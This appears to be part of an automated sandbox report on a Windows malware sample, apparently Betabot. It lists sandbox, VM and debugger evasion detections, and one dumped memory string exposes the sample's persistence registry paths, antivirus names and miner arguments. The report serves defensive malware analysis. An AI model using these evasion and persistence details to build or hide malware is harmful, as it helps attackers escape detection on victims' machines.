                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 0000000C.00000000.345188732.0000000000B88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL_
                      Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL[BETA]
                      Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-310
                      Tries to detect virtualization through RDTSC time measurements
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeRDTSC instruction interceptor: First address: 0000000000AC45A1 second address: 0000000000AC45A6 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-08h], eax 0x00000005 rdtsc
                      Source: C:\Windows\SysWOW64\WerFault.exeRDTSC instruction interceptor: First address: 00000000028645A1 second address: 00000000028645A6 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-08h], eax 0x00000005 rdtsc
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5216Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1064Thread sleep count: 724 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1064Thread sleep time: -43440s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5036Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5260Thread sleep count: 738 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5260Thread sleep time: -44280s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5468Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4600Thread sleep count: 720 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4600Thread sleep time: -43200s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5388Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 760Thread sleep count: 375 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4356Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5716Thread sleep count: 696 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5716Thread sleep time: -41760s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4852Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4940Thread sleep count: 680 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4940Thread sleep time: -40800s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1352Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5884Thread sleep count: 663 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5884Thread sleep time: -39780s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1248Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1348Thread sleep count: 631 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1348Thread sleep time: -37860s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4012Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1916Thread sleep count: 638 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1916Thread sleep time: -38280s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4980Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1008Thread sleep count: 598 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1008Thread sleep time: -35880s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 3620Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4032Thread sleep count: 566 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4032Thread sleep time: -33960s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5484Thread sleep time: -540000s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5444Thread sleep count: 552 > 30Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5444Thread sleep time: -33120s >= -30000sJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5968Thread sleep time: -540000s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5504Thread sleep count: 523 > 30
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5504Thread sleep time: -31380s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 1876Thread sleep time: -540000s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 6072Thread sleep count: 506 > 30
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 6072Thread sleep time: -30360s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5356Thread sleep time: -540000s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 5296Thread sleep count: 480 > 30
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 272Thread sleep time: -540000s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 3856Thread sleep count: 456 > 30
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 2248Thread sleep time: -540000s >= -30000s
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe TID: 4568Thread sleep count: 445 > 30
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\SysWOW64\WerFault.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-318
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02864592 rdtsc 4_2_02864592
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 724Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 738Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 720Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 375Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 696Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 680Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 663Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 631Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 638Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 598Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 566Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 552Jump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 523
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 506
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 480
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 456
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeWindow / User API: threadDelayed 445
                      Source: C:\Windows\SysWOW64\WerFault.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-24822
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened / queried: VBoxGuestJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile opened / queried: HGFSJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0286531A GetSystemInfo,4_2_0286531A
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeAPI call chain: ExitProcess graph end nodegraph_0-312
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmpBinary or memory string: Software\VMware, Inc.
                      Source: WerFault.exe, 00000004.00000003.398831506.00000000003C0000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398926053.000000000038C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436671619.00000000003C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: yvneslhpc.exe, 00000003.00000002.306354467.0000000000F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllg
                      Source: WerFault.exe, 00000004.00000002.565787499.000000000031F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWpz9%SystemRoot%\system32\mswsock.dll
                      Source: zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\services\%sImagePathtooltips_class32%c:\ntusbdriver.sys%c:\*p.exe%c:\%s%c:\p.exe.lnk%WinDir%\explorer.exe /C start /d. %s&"%s"%COMSPEC%%WinDir%\system32\shell32.dll%c:\%s.lnk{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}VisthAux.exesnxhk.dllLanguageSoftware\Valve\SteamMRU0Software\Microsoft\Terminal Server Client\Defaultexplorer.exeSOFTWARE\Classes\originjagexcacheSOFTWARE\Blizzard Entertainment.minecraftLeague of LegendsSoftware\SkypeSoftware\Microsoft\VisualStudioSoftware\VMware, Inc.(unknown)Works! PID: %d, Name: %sBetabot (c) 2012-2014, coded by Userbasedcomctl32.dllGetAddrInfoWGetAddrInfoExWZwOpenProcessZwCreateFileZwOpenFileZwSetValueKeyZwDeleteValueKeySOFTWARE\%sSymantecAviraESETArcaBitavastSpIDerAgentAPVXDWINcmdvirth%08x%s%s\%08X%02Xupdate.microsoft.commicrosoft.comwindowsupdate.microsoft.comJOIN PRIVMSG :USER stratumbtcguildtcp:// -p -u-a scrypt -u http:// -t @svchost.execsrss.exelsass.exesmss.exewscript.execscript.exevbc.exerundll32.exeregsvr32.exe%ALLUSERSPROFILE%SOFTWARE\Microsoft\CurrentVersion\RunSOFTWARE\Microsoft\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSystemwinlogon.exeservices.exekernel32.dllSeTcbPrivilege.ini.sys%s\%08x.lnkSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%sdesktop.iniSOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceSOFTWARE\Microsoft\Windows NT\CurrentVersion\WindowsLoadwintrust.dllWinVerifyTrust.rdatachrome.dllcmd_option.%s/c %srunascmd.exeApplications\iexplore.exe\shell\open\commandmsvcrt.dll
                      Source: yvneslhpc.exe, 0000000D.00000002.343818757.00000000013B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                      Anti Debugging

                      barindex
                      Hides threads from debuggers
                      Source: C:\Windows\SysWOW64\WerFault.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebugger
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeThread information set: HideFromDebugger
                      Contains functionality to hide a thread from the debugger
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028660AA NtSetInformationThread 000000FE,00000011,00000000,000000004_2_028660AA
                      Potentially malicious time measurement code found
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02864592 Start: 028645A1 End: 028645A64_2_02864592
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A64592 Start: 03A645A1 End: 03A645A65_2_03A64592
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 6_2_03334592 Start: 033345A1 End: 033345A66_2_03334592
